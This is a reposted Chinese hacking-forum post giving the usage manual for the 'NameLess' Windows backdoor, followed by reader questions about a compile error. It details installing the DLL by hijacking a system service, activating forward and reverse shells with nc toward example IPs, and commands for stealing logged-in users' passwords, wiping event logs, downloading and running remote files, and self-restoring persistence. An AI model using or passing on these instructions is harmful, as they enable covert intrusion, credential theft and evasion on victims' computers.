[转载]nameless源代码
From:ph4nt0m BBSNameLess BackDoor V1.14 (稳定版)
平时不开端口,可以进行反连接的后门程序,它集成了榕哥的BITS和WinEggDrop的PortLess所具有的优点.(具体什么优点就请看他们的说明吧)
以下大体引用PortLess的说明:
连接方式:
1.正向连接;
2.反向连接;
一,如何使用:
1.将NameLess.dll(可以改名)上传到任意目录(最好是在系统目录:%winnt%\system32目录中)
2.打开CMD窗口,转到后门放置的目录,输入
安装命令 :Rundll32 NameLess.dll,Install ServiceName ActiveString Password
设置新的字符和密码:Rundll32 NameLess.dll,SetNew Password NewActiveString NewPassword
卸载命令 :Rundll32 NameLess.dll,Remove Password
这里的要严格区分大小写的,后门安装会自动替换系统服务ServiceName的ServiceDll的指向路径为自己的路径。
Password是使用连接上后门打开的端口时需要输入的密码
ServiceName是替换系统服务名
请你在安装完之后,请在CMD下Net Start ServiceName才能启动后门(这和上一版不同)
后门卸载和设置新的字符和密码命令只有在你进入后门的命令行,输入UnShield之后才会起作用.(具体原因看命令说明)
二,使用说明:
在连接上肉机任一端口输入验证用的字符串,那个字符串格式是ActiveString|IP:Port,如果你要使用的是
反向连接的话,ActiveString,IP,Port都要输入;如果只是想在本地绑入端口模式,不需要输入IP,而且要注意的
是两个符号|和:,在IP前的是|,在Port前的是:,如果你弄错了,程序是不能识别的,而且ActiveString,IP和Port之
间是没有任何空格的.如果你使用过命令行的Portless V1.2的话,应该对这个有一点认识.
例子1:进行正向连接
1.nc 12.12.12.12 80(80为肉鸡的任意开放端口)
2.看到连上后,输入dargun:90
3.nc 12.12.12.12 90,看到"Enter Password:"的Banner后,输入密码158352692,你就登陆了.
4.对于正向连接,如果激活后2分钟内没有任何连接成功登陆,就会自动断开(这是防止有防火墙拦住正向连接,如果正向连接不退出的话,无法再次激活)
例子2:进行反向连接(假设我的IP是13.13.13.13,这个是我的公网IP)
1.在自己系统中,运行nc -l -p 12345
2.nc 12.12.12.12 80
3.看到连上后,输入dargun|13.13.13.13:12345
4.然后在运行了nc -l -p 12345这个cmd的窗口中,可以看到它和你自己了连上,然后输入密码登陆。
登陆后,你并不是得到一个cmd的shell的,如果你使用过winshell,wollf或wineggdropshell的话,
对这种模式的后门就不会陌生.你登陆后,如果你输入help命令的话,你会看到可以使用很多命令
的自己看吧!(我的功能和WinEggDropShell的差不多,当然我的还没它那么强大)
三,命令说明:
1.Pslist 功能说明:显示进程
2.ListIP 功能说明:显示系统所有IP和域名
3.Reboot 功能说明:重启那台系统
4.ShutDown 功能说明:关闭那台系统
5.Logoff 功能说明:注销登陆了的帐户
6.PowerOff 功能说明:关那系统电源
7.Shell 功能说明:得到一个Shell
8.Pskill 功能说明:杀进程
9.Execute 功能说明:执行程序
10.[url]Http://IP/[/url]文件 功能说明:下载文件
11.Installterm 功能说明:安装终端服务
12.Exit 功能说明:断开连接
13.Help 功能说明:显示命令说明
14.DeleteService 功能说明:删除系统某个服务
15.CleanEvent 功能说明:清除系统日志
16.TerminalPort 功能说明:重新设置终端服务端口
17.AR 功能说明:恢复系统几个常用的关联的设置
18.GetUser 功能说明:列举系统所有帐户
19.Sysinfo 功能说明:查看系统的信息
20.ViewService 功能说明:查看某个服务的状态
21.EnumService 功能说明:列举所有的服务的资料
22 Modlist 功能说明:显示进程模块
23.Findpass 功能说明:得到所有当前登陆上系统的用户的密码
24.Shield 功能说明:启动后门的自我保护功能
25.UnShield 功能说明:停止后门的自我保护功能
26.ExitShell 功能说明:在CMD的shell下返回到[Sharow]#模式
27.StartService
28.StopService
29.ViewKey
30.DelKey
31.TcpList
32.TcpKill
33.TerminalPort
34.ConfigService
详细的命令用法请看最后的命令说明
1.CleanEvent 功能:删除系统日志
例子:CleanEvent
2.GetUser 功能:列举系统所有帐户
例子:GetUser
3.DelUser 功能:删除一个用户
用法:DelUser 用户名
例子:Deluser Test
上面例子会将test这个用户删除
4.Exit 功能:退出后门
例子:Exit
5.[url]http://ip/[/url]文件名 保存文件名 功能:下载程序
例子?[url]http://11.11.11.11/a.exe[/url] a.exe
例子?[url]http://www.mysite.com/a.exe[/url] a.exe
例子? [url]http://www.mysite.com:81/a.exe[/url] a.exe
6.Installterm 端口 功能:在没有安装终端服务的win 2k服务版的系统中安装终端服务,重启系统后才生效.
用法:Installterm 3345 (重启后终端会打开3345那个端口,使用此命令前先看看你要定义的终端的端口是否被
其它程序所用,我的还有点问题)
7.ListIP 功能:显示系统所有IP(外部,内部IP和电脑名等)
用法:ListIP
9.Logoff 功能:注销系统
例子:Logoff
10.PowerOff 功能:关闭电源
例子:PowerOff
11.Reboot 功能:重启系统
例子:Reboot
12.ShutDown 功能:关闭系统
例子:ShutDown
13.Shell 功能:得到一个Cmd Shell
例子:Shell
得到Shell要退出,输入exit就能退出后门,输入ExitShell就进入[Sharow]#状态
14.Sysinfo 功能说明:查看系统的信息(比较详细)
例子:Sysinfo
15.TerminalPort 新的端口 功能:重新设置终端服务端口
例子:TerminalPort 新的端口
注意:新端口必须是合法的端口,否则程序不会执行的
16.Pslit 功能:查进程
例子:Pslist
17.Pskill 进程PID 功能:杀进程
例子:pskill 1234
18.Modlist 功能:显示进程模块
例子:Modlist
19.Execute 程序 功能:在后台中执行程序
用法:Execute abc.exe
用法:Execute net.exe user test test
注意:要执行的程序最好要加扩展名,否则可能不会执行成功.
20.EnumService 功能:列举所有的服务的资料
例子:EnumService
21.Findpass 功能:得到当前登陆上系统的用户的密码(这个功能是我抄的)
例子:Findpass
22.ViewService 服务名 功能:查看服务信息
例子: ViewService w3svc
23.DeleteService 服务名 功能:删除服务
例子:DeleteService w3svc
24.Shield 功能说明:启动后门的自我保护功能
例子:Shield
25.UnShield 功能说明:停止后门的自我保护功能
例子:UnShield
26.ExitShell 功能:从Shell中退回到[Sharow]#这个状态,让你继续使用后门提供的命令
例子:ExitShell
注意:这命令是当你得到一个的CMD时使用的,在[Sharow]#状态中还不算是得到shell,WinEggDrop大哥称这状态
为Pre-Shell,在[Sharow]#执行shell这命令后你才在shell下,你在shell下就可以执行ExitShell这
个命令退回到[Sharow]#这个Pre-Shell状态,注意,正向反向连接都可以的.
四,有必要加以说明的功能:
1.ExitShell
此功能主要是用于当用户成功得到一个Cmd下的shell后,想回到[Sharow]#模式下去继续使用命令
,就可以使用ExitShell直接切换会[Sharow]#模式,这样就方便用户不需要直接断开,然后再连
接上后门才可以到达[Sharow]#模式。
2.Shield
此功能主要是保护后门不被删除,后门启动是会开两个线程,其中一个就是保护线程,每过30秒就检查一次,如果
后门程序被删除或者注册表被改动的话,就回自动恢复的,如果想卸载后门的话,必须先用UnShield停掉这个线
程才行,否则会卸载不了的!
五,其它说明:
1.后门只能用在win 2k/xp/2003中.
2.使用反向连接,接受这个反向连接的系统必须有一个公网IP.
3.后门启动时会生成一个NameLess.log的文件(文件保存在:%winnt%\Temp中),这个是记录后门的出错信息和启动信息的,
如果你使用不了这后门,可以看看NameLess.log中的信息,或者可以看到是哪里出错了.
4.请不要在拨号系统中使用,因为多数会失败.失败原因是由于在拨号系统中,当后门加载时,这个系统
还不存在一个IP让后门绑入并嗅探(拨号的需要管理员登陆系统后再执行拨号程序,成功拨入后才会
有一个IP).如果你看到NameLess.log中有一行写着"Fail To Get IP To Sniff"或者是"Fail To Bind Raw Socket"
的错误信息,大致就是装在拨号的系统了.
5.程序兼容所有的标准NC和非标准NC,系统本身的Telnet只可以进行连接,无法激活后门.
[url]www.ph4nt0m.org[/url]
dargoner
2005.5.15 我编译为什么会这样?
“fatal error C1083: Cannot open include file: 'iphlpapi.h': No such file or directory ”
这个 iphlpapi.h 哪里才有啊? [s:43] google
and you must install sdk to compiler it
页:
[1]